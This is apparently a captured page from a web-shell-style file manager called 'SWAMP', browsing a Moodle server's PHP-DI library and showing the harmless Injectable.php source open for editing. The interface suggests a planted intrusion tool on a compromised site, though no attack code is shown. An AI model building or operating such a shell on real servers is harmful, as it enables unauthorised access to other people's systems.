░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/moodle/public/lib/php-di/php-di/src/Attribute
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: Injectable.php
<?php declare(strict_types=1); namespace DI\Attribute; use Attribute; /** * "Injectable" attribute. * * Marks a class as injectable * * @api * * @author Domenic Muskulus <domenic@muskulus.eu> * @author Matthieu Napoli <matthieu@mnapoli.fr> */ #[Attribute(Attribute::TARGET_CLASS)] final class Injectable { /** * @param bool|null $lazy Should the object be lazy-loaded. */ public function __construct( private ?bool $lazy = null, ) { } public function isLazy() : bool|null { return $this->lazy; } }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 Inject.php
PHP
1.7 KB
2026-02-11 01:44
EDIT
📄 Injectable.php
PHP
566 B
2026-02-11 01:44
EDIT